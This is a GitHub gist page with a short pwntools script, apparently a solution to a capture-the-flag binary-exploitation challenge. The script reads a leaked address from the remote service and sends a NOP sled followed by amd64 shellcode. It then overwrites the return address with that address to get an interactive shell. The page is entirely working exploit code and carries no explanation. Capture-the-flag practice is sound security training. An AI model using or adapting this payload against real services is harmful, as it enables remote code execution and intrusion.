Skip to content

Instantly share code, notes, and snippets.

@Rajchowdhury420
Created April 19, 2024 09:33
Show Gist options
  • Save Rajchowdhury420/51851c2fdff512701f2136acd122afa6 to your computer and use it in GitHub Desktop.
Save Rajchowdhury420/51851c2fdff512701f2136acd122afa6 to your computer and use it in GitHub Desktop.
from pwn import *
r = remote("chal.iutctf.xyz", 6900)
payload = asm(shellcraft.amd64.sh(), arch='amd64')
r.recvuntil(b"lives: ")
leak = int(r.recv(14),16)
print(hex(leak))
print(len(payload))
s = b"\x90"*40+payload+p64(leak)
r.recv()
r.sendline(s)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment